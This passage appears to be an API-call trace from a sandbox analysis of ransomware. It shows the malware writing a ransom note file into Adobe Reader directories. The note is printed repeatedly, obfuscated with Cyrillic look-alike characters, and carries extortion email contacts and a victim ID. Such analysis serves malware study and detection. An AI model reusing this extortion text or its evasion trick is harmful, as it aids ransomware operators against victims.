\\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.275] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.276] CloseHandle (hObject=0x1cc) returned 1 [0066.276] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\bg85_info.rtf")) returned 0xffffffff [0066.276] GetLastError () returned 0x2 [0066.276] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in 